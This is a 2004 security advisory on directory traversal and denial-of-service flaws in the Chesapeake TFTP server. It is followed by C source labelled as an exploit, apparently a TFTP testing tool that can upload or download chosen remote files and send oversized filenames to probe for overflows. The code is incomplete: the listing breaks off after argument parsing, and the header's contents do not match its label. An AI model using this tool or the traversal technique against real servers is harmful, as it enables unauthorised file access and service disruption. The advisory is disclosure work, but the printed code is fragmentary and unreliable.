Chesapeake TFTP Server Directory Traversal and DoS Vulnerabilities
3 Nov. 2004
Summary
Chesapeake TFTP Server is (was) "a server written in Java some years ago from the Chesapeake developers (now Netcordia)".
Two vulnerabilities have been discovered in the Chesapeake TFTP server, a denial of service vulnerability allowing an attacker to cause the server to no longer respond to legitimate requests and a directory traversal vulnerability that allows a remote attacker to access files that he would be otherwise unable to access.
Credit:
The information has been provided by Luigi Auriemma.
Directory traversal:
The server is vulnerable to a classic directory traversal bug happening when an attacker uses the dot-dot-slash/backslash pattern letting him to upload or download files everywhere in the disk on which is set the base file directory.
Denial of Service
The server stops to respond to the clients requests if receives an UDP packet bigger than 514 bytes.
Exploit: show_dump.h
/*
Show_dump 0.1
Copyright 2004 Luigi Auriemma
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
http://www.gnu.org/licenses/gpl.txt
function to show the hex dump of a buffer
Usage:
to show the hex dump on the screen:
show_dump(buffer, buffer_length, stdout);
to write the hex dump in a file or other streams:
show_dump(buffer, buffer_length, fd);
(if you know C you know what FILE *stream means 8-)
*/
FILE *fd;
int sd,
hexdump = 0;
struct sockaddr_in peer;
int main(int argc, char *argv[]) {
u_long tsize = 0;
int i,
len,
psz,
upload = 0,
blocksize = 0,
tout = 0,
multicast = 0,
overwrite = 0,
bofsize = 0;
u_short port = PORT;
u_char *buff,
*local,
*remote,
*custom_option = NULL,
*custom_value = NULL;
struct stat xstat;
setbuf(stdout, NULL);
fputs("\n"
"TFTP server tester "VER"\n"
"by Luigi Auriemma\n"
"e-mail: aluigi@altervista.org\n"
"web: http://aluigi.altervista.org\n"
"\n", stdout);
if(argc < 2) {
printf("\n"
"Usage: %s [options] <host> <remote_file> <local_file>\n"
"\n"
"-u upload a file, default is download\n"
"-t SIZE tftp tsize option, default is %lu or real size if upload\n"
"-b SIZE tftp blocksize option, default is not set\n"
"-o NUM tftp timeout option, default is not set\n"
"-m NUM tftp multicast option, default is not set\n"
"-c X Y add a custom value where X is the option and Y its value\n"
"-C X Y like above but X and Y are the size of the 2 values filled with '%c'\n"
"-p PORT server port, default is %hu\n"
"-x show the hexdump of any packet received\n"
"-y automatically overwrite the local file if exists (only download)\n"
"-f [CHR] this option is useful to easily test possible buffer-overflows in the\n"
" filename sent to the server without manually specifying it. The\n"
" default char is '%c' (0x%02x) and the number of chars to compose the\n"
" filename must be specified in the remote_file argument.\n"
" Example: -f server 8192 local.txt\n"
"\n"
"Note: if local_file is equal to %s will be used stdout for upload or stdin\n"
" for download. Very useful to test overflow bugs without creating files.\n"
"\n", argv[0], tsize, CHR, port, CHR, CHR, NONE);
exit(1);
}
argc -= 3;
for(i = 1; i < argc; i++) {
switch(argv[i][1]) {
case '-':
case '?':
case 'h': {
fputs("\nError: use no arguments for the help\n", stdout);
exit(1);
} break;
case 'u': upload = 1; break;
case 't': tsize = atol(argv[++i]); break;
case 'b': blocksize = atoi(argv[++i]); break;
case 'o': tout = atoi(argv[++i]); break;
case 'm': multicast = atoi(argv[++i]); break;
case 'c': {
custom_option = argv[++i];
custom_value = argv[++i];
} break;
case 'C': {
len = atoi(argv[++i]);
custom_option = malloc(len + 1);
if(!custom_option) std_err();
memset(custom_option, CHR, len);
custom_option[len] = 0x00;
len = atoi(argv[++i]);
custom_value = malloc(len + 1);
if(!custom_value) std_err();
memset(custom_value, CHR, len);
custom_value[len] = 0x00;
} break;
case 'p': port = atoi(argv[++i]); break;
case 'x': hexdump = 1; break;
case 'y': overwrite = 1; break;
case 'f': bofsize = 1; break;
default: {
printf("\nError: Wrong command-line argument (%s)\n\n", argv[i]);
exit(1);
} break;
}
}
